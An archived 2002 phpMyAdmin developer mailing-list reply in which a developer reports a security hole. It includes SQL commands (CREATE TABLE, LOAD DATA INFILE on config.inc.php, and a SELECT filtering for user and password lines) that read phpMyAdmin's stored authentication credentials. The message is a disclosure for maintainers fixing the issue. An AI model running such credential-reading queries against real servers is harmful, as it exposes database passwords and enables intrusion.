[Phpmyadmin-devel] Re: MAJOR security hole
Robin Johnson
robbat2 at fermi.orbis-terrarum.net
Mon Aug 12 13:13:01 CEST 2002
On Mon, 12 Aug 2002, Marc Delisle wrote:
> > On Mon, 12 Aug 2002, Marc Delisle wrote:
> > > > I've just merged a fix against that, but it needs some testing since I do
> > > > not have a machine here which is affected by this securety hole.
> > > you won't like me, but I think we should wait to include a fix for a
> > > "hole" until a developer can reproduce it.
> >
> > I'm going to set up a copy of PMA that exhibits the security hole for us
> > to test out bug. Give me a day or two, as I have some more pressing work
> > at the moment.
> Robin,
>
> the "goto" problem?
>
> Marc
I've checked out the goto problem, and you were right, it is fixed in the
recent releases. It now limits you to files only in the phpMyAdmin install
directory. Which can still be a problem in itself I think.
On checking out the other problem with systems totally open using the
config mechanism, try out this series of SQL Commands:
First time around:
CREATE TABLE testB ( t mediumtext );
LOAD DATA INFILE '/home/robbat2/public_html/PMA/config.inc.php' INTO TABLE
testB FIELDS TERMINATED BY '\n' LINES TERMINATED BY '\n';
Where you need to change the path of the file, and the 'TERMINATED BY'
parts for your own systems.
When that completes,
I ran this:
SELECT * FROM testB WHERE t like '%Server%' AND (t like '%user%' or t like
'%password%');
To get just the PMA authentication data.
Of course, this exploit requires that the user have the FILE privilege.
This would apply to all cases where PMA has been set up with the user as
root, or anybody else with the FILE privilege.
I'm carrying on looking for more holes along these lines.
--
Robin Hugh Johnson
E-Mail : robbat2 at orbis-terrarum.net
Home Page : http://www.orbis-terrarum.net/?l=people.robbat2
ICQ# : 30269588 or 41961639
More information about the Developers
mailing list